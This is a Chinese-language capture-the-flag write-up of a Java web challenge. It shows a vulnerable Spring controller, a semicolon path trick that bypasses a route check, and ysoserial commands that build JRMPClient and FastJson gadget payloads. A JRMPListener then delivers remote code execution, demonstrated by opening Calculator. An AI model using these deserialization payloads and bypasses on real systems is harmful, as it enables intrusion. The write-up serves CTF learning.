Web-ezJava赛题复盘
路由绕过
payload http://localhost/;Evil 绕过 if (path.startsWith("/Evil"))
@ResponseBody
@RequestMapping({"/Evil"})
public String Evil(HttpServletRequest request, HttpServletResponse response) throws IOException, ClassNotFoundException {
String path = request.getRequestURI();
if (path.startsWith("/Evil"))
return "nonono!!!";
String base = request.getParameter("base");
EInputStream in = new EInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(base)));
Object a = in.readObject();
return "OK";
}EInputStream
EInputStream in = new EInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(base)));
我们可以看到路由下base64解码了base参数,并传给了EInputStream,而我们本地调试修改成ObjectInputStream1:
ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(base)));
可以直接RCE:
所以可以看到,有很明显的反序列化的地方,不过需要做一些绕过,通过重写ObjectInputStream::resolveClass方法来实现的2;
Gadget
URLDNS
使用URLDNS Gadget测试一下:
java -jar ysoserial.jar JRMPClient "localhost:1099"|base64
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 URLDNS "http://dnslog"
攻击成功:
More video info for above:
RCE
所以为了RCE去查看了lib,本地服务没有可以直接调用的Gadget,尝试一些cc Gadget发现报错:
ERROR 1 --- [nio-8080-exec-9] o.a.c.c.C.[.[.[/].[dispatcherServlet] : Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is java.lang.IllegalArgumentException: Illegal base64 character 20] with root cause
java.lang.IllegalArgumentException: Illegal base64 character 20
at java.util.Base64$Decoder.decode0(Base64.java:714) ~[na:1.8.0_171]
···
···
at java.lang.Thread.run(Thread.java:748) [na:1.8.0_171]
解法
我们回头看依赖:
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.48</version>
</dependency>
找到教程说是通过FastJson进行二次反序列化3
add payload
- error
[ERROR] /Users/bin4xin/.../FastJson.java:[3,27] 错误: 程序包com.alibaba.fastjson不存在
添加jar到本地仓库
mvn install:install-file -Dfile=/Users/bin4xin/path/to/fastjson-1.2.48.jar -DgroupId=com.alibaba -DartifactId=fastjson -Dversion=1.2.48 -Dpackaging=jar
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
···
FastJson
···
JRMPClient_bypass_jep_jdk241
exp
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient_bypass_jep_jdk241 "127.0.0.1:1099"|base64
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 FastJson "open /System/Applications/Calculator.app"
调用:
javax.management.BadAttributeValueExpException#readObject
com.alibaba.fastjson.JSON#toJSONString
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl#getOutputProperties
报错:
Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is java.lang.IllegalArgumentException: Illegal base64 character 20] with root cause
java.lang.IllegalArgumentException: Illegal base64 character 20
at java.util.Base64$Decoder.decode0(Base64.java:714) ~[na:1.8.0_181]
解决:
成功:
REF
以上,完结。